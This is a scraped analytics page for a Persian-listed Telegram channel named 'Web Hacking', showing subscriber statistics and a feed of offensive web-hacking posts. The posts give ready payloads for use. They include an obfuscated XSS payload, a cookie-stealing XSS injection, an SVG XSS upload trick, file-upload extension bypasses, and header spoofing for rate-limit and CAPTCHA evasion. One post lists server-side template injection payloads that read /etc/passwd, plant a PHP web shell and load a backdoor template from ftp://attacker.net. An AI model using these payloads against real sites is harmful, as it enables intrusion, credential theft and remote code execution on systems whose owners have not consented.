fa
Feedback
Web Hacking

Web Hacking

رفتن به کانال در Telegram
2 028
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
+1830 روز

در حال بارگیری داده...

کانال‌های مشابه
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسب‌ها
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
اوت '24
اوت '24
+49
در 0 کانال‌ها
ژوئیه '24
+95
در 0 کانال‌ها
Get PRO
ژوئن '24
+87
در 0 کانال‌ها
Get PRO
مه '24
+127
در 1 کانال‌ها
Get PRO
آوریل '24
+96
در 1 کانال‌ها
Get PRO
مارس '24
+52
در 0 کانال‌ها
Get PRO
فوریه '24
+49
در 0 کانال‌ها
Get PRO
ژانویه '24
+50
در 0 کانال‌ها
Get PRO
دسامبر '23
+75
در 0 کانال‌ها
Get PRO
نوامبر '23
+80
در 0 کانال‌ها
Get PRO
اکتبر '23
+78
در 0 کانال‌ها
Get PRO
سپتامبر '23
+66
در 0 کانال‌ها
Get PRO
اوت '23
+69
در 0 کانال‌ها
Get PRO
ژوئیه '23
+95
در 0 کانال‌ها
Get PRO
ژوئن '23
+50
در 0 کانال‌ها
Get PRO
مه '23
+69
در 0 کانال‌ها
Get PRO
آوریل '23
+69
در 0 کانال‌ها
Get PRO
مارس '23
+75
در 0 کانال‌ها
Get PRO
فوریه '23
+76
در 0 کانال‌ها
Get PRO
ژانویه '23
+92
در 0 کانال‌ها
Get PRO
دسامبر '22
+64
در 0 کانال‌ها
Get PRO
نوامبر '22
+103
در 0 کانال‌ها
Get PRO
اکتبر '22
+89
در 0 کانال‌ها
Get PRO
سپتامبر '22
+115
در 0 کانال‌ها
Get PRO
اوت '22
+72
در 0 کانال‌ها
Get PRO
ژوئیه '22
+119
در 0 کانال‌ها
Get PRO
ژوئن '22
+30
در 0 کانال‌ها
Get PRO
مه '22
+24
در 0 کانال‌ها
Get PRO
آوریل '22
+37
در 0 کانال‌ها
Get PRO
مارس '220
در 0 کانال‌ها
Get PRO
فوریه '220
در 0 کانال‌ها
Get PRO
ژانویه '220
در 0 کانال‌ها
Get PRO
دسامبر '21
+8
در 0 کانال‌ها
Get PRO
نوامبر '21
+28
در 0 کانال‌ها
Get PRO
اکتبر '21
+23
در 0 کانال‌ها
Get PRO
سپتامبر '21
+45
در 0 کانال‌ها
Get PRO
اوت '21
+36
در 0 کانال‌ها
Get PRO
ژوئیه '21
+27
در 0 کانال‌ها
Get PRO
ژوئن '21
+27
در 0 کانال‌ها
Get PRO
مه '21
+31
در 0 کانال‌ها
Get PRO
آوریل '21
+43
در 0 کانال‌ها
Get PRO
مارس '21
+33
در 0 کانال‌ها
Get PRO
فوریه '21
+51
در 0 کانال‌ها
Get PRO
ژانویه '21
+38
در 0 کانال‌ها
Get PRO
دسامبر '20
+382
در 0 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
21 اوت+2
20 اوت+5
19 اوت+1
18 اوت+2
17 اوت+2
16 اوت+1
15 اوت0
14 اوت+3
13 اوت+5
12 اوت+3
11 اوت+3
10 اوت+3
09 اوت+1
08 اوت+2
07 اوت+1
06 اوت+1
05 اوت+1
04 اوت+2
03 اوت0
02 اوت+6
01 اوت+5
('%00tst@tst.com.br #XSS #Pay…","articleBody":"Payload XSS on login page:\n\n');\\\\('%00tst@tst.com.br\n\n#XSS #Payload","datePublished":"2023-12-30T11:52:15Z","dateModified":"2023-12-30T11:52:47Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-12-30T11:51:53Z"}}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/133","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/133","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/133","headline":"https://t.me/PythonForCyberSecurity","articleBody":"https://t.me/PythonForCyberSecurity","datePublished":"2023-12-26T03:38:30Z","dateModified":"2023-12-26T03:38:30Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1112},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/132","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/132","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/132","headline":"Bug bounty Cheatsheet: For more like this, join us at: t.me/OSCP_training XSS https://github.com/EdOverflow/b…","articleBody":"Bug bounty Cheatsheet:\n\nFor more like this, join us at:\nt.me/OSCP_training\n\nXSS\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md\nhttps://github.com/ismailtasdelen/xss-payload-list\n\nSQLi\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md\n\nSSRF\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery\n\nCRLF\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection\n\nCSV-Injection\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection\n\nCommand Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\n\nDirectory Traversal\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal\n\nLFI\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n\nXXE\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md\n\nOpen-Redirect\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md\n\nRCE\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md\n\nCrypto\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md\n\nTemplate Injection\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\n\nXSLT\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md\n\nContent Injection\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md\n\nLDAP Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection\n\nNoSQL Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection\n\nCSRF Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection\n\nGraphQL Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection\n\nIDOR\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References\n\nISCM\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management\n\nLaTex Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection\n\nOAuth \nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth\n\nXPATH Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection\n\nBypass Upload Tricky\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files","datePublished":"2023-12-25T19:48:30Z","dateModified":"2023-12-25T19:48:30Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":817},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":33}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-12-25T19:47:45Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/131","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/131","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/131","headline":"GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercis…","articleBody":"GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines\nhttps://github.com/rodolfomarianocy/OSCP-Tricks-2023","datePublished":"2023-12-21T17:24:15Z","dateModified":"2023-12-21T17:24:15Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":696},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-12-21T15:45:55Z"}}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/130","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/130","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/130","headline":"Cross-Site Request Forgery https://www.saygili.org/2020/11/cross-site-request-forgery.html","articleBody":"Cross-Site Request Forgery\nhttps://www.saygili.org/2020/11/cross-site-request-forgery.html","datePublished":"2023-12-18T21:05:52Z","dateModified":"2023-12-18T21:05:52Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":889},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/129","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/129","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/129","headline":"HTTP Host Header Attack https://www.saygili.org/2020/11/http-host-header-attack.html","articleBody":"HTTP Host Header Attack\nhttps://www.saygili.org/2020/11/http-host-header-attack.html","datePublished":"2023-12-14T18:48:50Z","dateModified":"2023-12-14T18:48:50Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":937},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/128","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/128","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/128","headline":"WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","articleBody":"WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","datePublished":"2023-10-28T08:43:51Z","dateModified":"2023-10-28T08:43:51Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":354},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-10-28T08:43:14Z"}}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/127","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/127","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/127","headline":"https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","articleBody":"https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","datePublished":"2023-10-08T17:13:20Z","dateModified":"2023-10-08T17:13:20Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":549}]}}]}
پست‌های کانال
Web Application Lab Setup Guide .pdf1.08 MB

2
a XSS payload, Cuneiform-alphabet based ! 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆
a XSS payload, Cuneiform-alphabet based ! 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
1
3
File Upload Bypass - Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .ph
File Upload Bypass - Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml Jsp → .jsp, .jspx, .jsw, .jsv, .jspf Coldfusion → .cfm, .cfml, .cfc, .dbm Perl → .pl, .cgi Using random capitalization → .pHp, .pHP5, .PhAr Whitelisting Bypass file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php#.png file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png file.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg
4 932
4
Rate Limit Bypass Techniques: Adding HTTP Headers to Spoof IP and Evade Detection: X-Forwarded-For: 127.0.0.1 X-Forwarded-For-Original: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Host: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1
699
5
SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %>
SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %> #{3*3} #{ 3 * 3 } [[3*3]] ${2*2} @(3*3) ${= 3*3} {{= 7*7}} ${{7*7}} #{7*7} [=7*7] {{ request }} {{self}} {{dump(app)}} {{ [] .class.base.subclassesO }} {{''.class.mro()[l] .subclassesO}} for c in [1,2,3] %}{{ c,c,c }}{% endfor %} {{ []._class.base.subclasses_O }} {{['cat%20/etc/passwd']|filter('system')}} PHP {php}print "Hello"{/php} {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} {{dump(app)}} {{app.request.server.all|join(',')}} "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {$smarty.version} {php}echo id;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} Python {% debug %} {{settings.SECRET_KEY}} {% import foobar %} = Error {% import os %}{{os.system('whoami')}}
4 041
6
Google Dorks to Find Sensitive data or dir
Google Dorks to Find Sensitive data or dir
3 132
7
APIs Fuzzing for Bug Bounty.pdf
708
8
CAPTCHA Bypass * Send old captcha value. * Send old captcha value with old session ID. * Remove captcha with any adblocker and request again * Bypass with OCR * Response manipulation. * Use any token with the same length(+1/-1). * Remove the param value or remove the entire parameter. * Change the method from POST to GET(or PUT) and remove the captcha. * Change body to JSON or vice-versa. * Check whether the value of the captcha is in the source code. * Add headers: X-Forwarded-Host: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Host: 127.0.0.1
570
9
Tryhackme.pdf
564
10
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml"> <foreignObject width="100%" height="100%"> <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
747
11
بدون متن...
749
12
WhatsApp'ta OSCP Training kanalını takip edin: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a
961
13
Payload XSS on login page: ');\\</script><script>alert(document.cookie)</script>('%00tst@tst.com.br #XSS #Payload
1
14
https://t.me/PythonForCyberSecurity
1 112
15
Bug bounty Cheatsheet: For more like this, join us at: t.me/OSCP_training XSS https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md https://github.com/ismailtasdelen/xss-payload-list SQLi https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md SSRF https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery CRLF https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection CSV-Injection https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection Command Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection Directory Traversal https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal LFI https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion XXE https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md Open-Redirect https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md RCE https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md Crypto https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md Template Injection https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection XSLT https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md Content Injection https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md LDAP Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection NoSQL Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection CSRF Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection GraphQL Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection IDOR https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References ISCM https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management LaTex Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection OAuth https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth XPATH Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection Bypass Upload Tricky https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
817
16
GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines https://github.com/rodolfomarianocy/OSCP-Tricks-2023
696
17
Cross-Site Request Forgery https://www.saygili.org/2020/11/cross-site-request-forgery.html
889
18
HTTP Host Header Attack https://www.saygili.org/2020/11/http-host-header-attack.html
937
19
WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
354
20
https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
549